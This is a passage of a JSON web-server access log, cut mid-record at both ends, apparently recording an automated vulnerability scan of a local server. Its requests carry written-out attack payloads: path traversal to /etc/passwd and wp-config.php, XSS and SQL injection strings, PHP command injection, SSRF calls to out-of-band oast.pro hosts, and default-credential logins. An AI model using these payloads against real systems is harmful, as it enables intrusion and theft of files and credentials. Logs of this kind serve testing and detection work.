"13/May/2022:16:34:33 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /libs/granite/core/content/login/favicon.ico HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:33 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /website/lang/en_US?r=https://example.com/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.039","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:33 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /typo3/phpmyadmin/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.035","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:33 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /webstats/awstats.pl HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.045","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:33 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_weberpcustomer&controller=../../../../../../../../../../etc/passwd%00 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.031","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:33 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.well-known/openid-configuration HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.032","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:33 +0000","request_body":"log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /wp-login.php HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.034","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:33 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_ckforms&controller=../../../../../../../../../../etc/passwd%00 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.035","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:33 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /page/1%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:33 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-json/oembed/1.0/proxy?url=http://c9v8gvgsmpv8bafg0t00nzbk6um7surd6.oast.pro/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:33 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_powermail&controller=../../../../../../../../../../etc/passwd%00 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.029","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:33 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /v2/graphql/schema.json HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.031","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:33 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"297MPPr2g18IcLR9GOB7rDuVq5G.tld","request":"GET / HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.031","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:33 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /web/phpmyadmin/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.033","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:33 +0000","request_body":"{\x22test_type\x22:\x22ip\x22,\x22test_debug\x22:false,\x22ipnotify_type\x22:\x22http/get\x22,\x22ipnotify_address\x22:\x22http://c9v8gvgsmpv8bafg0t00ruw1i64yexzmn.oast.pro\x22,\x22ipnotify_username\x22:\x22\x22,\x22ipnotify_password\x22:\x22\x22,\x22ipnotify_port\x22:\x220\x22,\x22ipnotify_content_type\x22:\x22\x22,\x22ipnotify_template\x22:\x22\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /cps/test_backup_server?ACTION=TEST_IP&NOCONTINUE=TRUE HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.036","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:33 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /userportal/Controller?mode=8700&operation=1&datagrid=179&json={\x22\xF0\x9F\xA6\x9E\x22:\x22test\x22} HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.029","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:33 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-admin/admin.php?page=mf_gig_calendar&action=edit&id=\x22><\x22 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.034","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:33 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /mainfile.php?username=test&password=testpoc&_login=1&Logon=%27%3Becho%20md5(TestPoc)%3B%27 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.043","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:33 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /auth/realms/master/.well-known/openid-configuration HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.034","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:33 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /%5cgoogle.com/evil.html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.040","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:33 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /maxsite/page/1%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.033","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:33 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /webadmin/reporter/view_server_log.php?server=localhost&act=stats&filename=&offset=1&count=1000&sortorder=&log=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&offset=&sortitem=&filter= HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:33 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /v2/graphql/schema.xml HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.033","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:33 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /cs/career/getSurvey.jsp?fn=../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:33 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET / HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.036","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:33 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /xampp/phpmyadmin/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.035","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:33 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_jashowcase&view=jashowcase&controller=../../../../../../../etc/passwd%00 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.035","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:33 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /openam/XUI HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.029","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:33 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/2-click-socialmedia-buttons/libs/xing.php?xing-url=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:33 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /module/ph_simpleblog/list?sb_category=')%20OR%20true--%20- HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:33 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET ///etc....4.2.1....json HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.032","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:33 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/themes/oxygen-theme/download.php?file=../../../wp-config.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:33 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /server/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:33 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/whizz/plugins/delete-plugin.php?plugin=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:33 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /v2/graphql/schema.yaml HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.022","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:33 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /adminer?elastic=example.com&username= HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:33 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /web/database/manager HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:33 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /shop/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:33 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /phpMyAdmin/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:33 +0000","request_body":"icl_post_action=save_theme_localization&locale_file_name_en=EN\x22>\x0D\x0A","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /wp-admin/admin.php HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:33 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /XUI HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:33 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.../.../.../.../.../.../.../.../.../windows/win.ini HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:33 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /module/ph_simpleblog/list?sb_category=')%20AND%20false--%20- HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:33 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET ///etc.json?FNZ.css HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:33 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET / HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1';alert(/XSS/);//", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:33 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET / HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.029","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:33 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /hue/accounts/login?next=/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:33 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /v2/playground HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.020","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:33 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /auth/admin/master/console/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:33 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /_debug_toolbar/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:33 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /owa/auth/logon.aspx HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:33 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /language/lang HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:33 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /shindig/gadgets/proxy?container=default&url=http://oast.pro HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:33 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /XUI/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:33 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.../.../.../.../.../.../.../.../.../etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:33 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /agc/vicidial_mysqli_errors.txt HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:33 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET ///etc.json?FNZ.ico HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:33 +0000","request_body":"login=branding&password=branding&Submit=Login","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /webadmin/auth/verification.php HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.021","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"http://127.0.0.1/webadmin/start/", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:33 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /matomo HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:33 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /hue/accounts/login?next=/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:33 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name 